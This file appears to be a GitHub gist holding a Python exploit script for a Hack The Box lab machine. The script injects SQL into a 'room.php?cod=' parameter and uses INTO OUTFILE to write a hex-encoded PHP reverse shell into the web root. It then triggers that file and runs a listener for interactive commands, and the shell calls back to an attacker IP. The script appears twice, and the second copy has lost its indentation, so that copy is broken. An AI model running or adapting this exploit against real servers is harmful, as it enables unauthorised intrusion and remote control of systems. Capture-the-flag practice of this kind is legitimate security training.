vitorfhc/get_pepper.py

## get_pepper.py
# This code was written by Vitor Falcão <vitorfhc at protonmail.com>

#!/usr/bin/python3

from socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from threading import Thread
from requests import get, exceptions
from string import ascii_lowercase, ascii_uppercase
from random import choice
from binascii import hexlify

FILE = "reverse.min.php"  # file with reverse php shell
HOST = "http://10.10.10.143"  # htb machine ip
IP = "10.10.15.8"  # reverse shell ip
PORT = 1337  # reverse shell port


def random_string(length):
    letters = ascii_lowercase + ascii_uppercase
    string = [choice(letters) for i in range(length)]
    string = "".join(string)
    return string


def file_to_hex(filename):
    global IP
    global PORT
    port_str = str(PORT)
    with open(filename) as f:
        content = f.read()
    content = content.replace("$ip='ip'", f"$ip='{IP}'")
    content = content.replace("$port=1337", f"$port={port_str}")
    ret = "0x"
    ret += hexlify(content.encode()).decode()
    return ret


def sqli():
    global FILE
    print("Making sql injection")
    url = HOST + "/room.php?cod="
    random_name = random_string(8) + ".php"
    hex_payload = file_to_hex(FILE)
    payload = f"1 or 1=2 limit 0,1 into outfile '/var/www/html/{random_name}' lines terminated by {hex_payload}"
    get(url + payload)
    print("Created file", random_name, "on the server")
    return random_name


def execute_reverse(path):
    print("Executing reverse shell:", path)
    path = "/" + path
    url = HOST + path
    try:
        get(url, timeout=3)
    except exceptions.Timeout as e:
        pass


def listen_conn():
    global PORT
    with socket(AF_INET, SOCK_STREAM) as s:
        s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        s.bind(("0.0.0.0", PORT))
        s.listen()
        conn, addr = s.accept()
        with conn:
            print("Got connection from", addr)
            data = conn.recvmsg(4096)
            while True:
                data = conn.recvmsg(4096)
                print(data)
                send = input("Send: ")
                conn.sendall(send.encode())


def get_info():
    global IP
    new_ip = input(f"Your IP [{IP}]: ")
    if len(new_ip.strip()):
        IP = new_ip


def main():
    get_info()
    path = sqli()
    l = Thread(target=listen_conn)
    l.start()
    execute_reverse(path)
    l.join()


if __name__ == "__main__":
    main()
	# This code was written by Vitor Falcão <vitorfhc at protonmail.com>

	#!/usr/bin/python3

	from socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
	from threading import Thread
	from requests import get, exceptions
	from string import ascii_lowercase, ascii_uppercase
	from random import choice
	from binascii import hexlify

	FILE = "reverse.min.php" # file with reverse php shell
	HOST = "http://10.10.10.143" # htb machine ip
	IP = "10.10.15.8" # reverse shell ip
	PORT = 1337 # reverse shell port


	def random_string(length):
	letters = ascii_lowercase + ascii_uppercase
	string = [choice(letters) for i in range(length)]
	string = "".join(string)
	return string


	def file_to_hex(filename):
	global IP
	global PORT
	port_str = str(PORT)
	with open(filename) as f:
	content = f.read()
	content = content.replace("$ip='ip'", f"$ip='{IP}'")
	content = content.replace("$port=1337", f"$port={port_str}")
	ret = "0x"
	ret += hexlify(content.encode()).decode()
	return ret


	def sqli():
	global FILE
	print("Making sql injection")
	url = HOST + "/room.php?cod="
	random_name = random_string(8) + ".php"
	hex_payload = file_to_hex(FILE)
	payload = f"1 or 1=2 limit 0,1 into outfile '/var/www/html/{random_name}' lines terminated by {hex_payload}"
	get(url + payload)
	print("Created file", random_name, "on the server")
	return random_name


	def execute_reverse(path):
	print("Executing reverse shell:", path)
	path = "/" + path
	url = HOST + path
	try:
	get(url, timeout=3)
	except exceptions.Timeout as e:
	pass


	def listen_conn():
	global PORT
	with socket(AF_INET, SOCK_STREAM) as s:
	s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
	s.bind(("0.0.0.0", PORT))
	s.listen()
	conn, addr = s.accept()
	with conn:
	print("Got connection from", addr)
	data = conn.recvmsg(4096)
	while True:
	data = conn.recvmsg(4096)
	print(data)
	send = input("Send: ")
	conn.sendall(send.encode())


	def get_info():
	global IP
	new_ip = input(f"Your IP [{IP}]: ")
	if len(new_ip.strip()):
	IP = new_ip


	def main():
	get_info()
	path = sqli()
	l = Thread(target=listen_conn)
	l.start()
	execute_reverse(path)
	l.join()


	if __name__ == "__main__":
	main()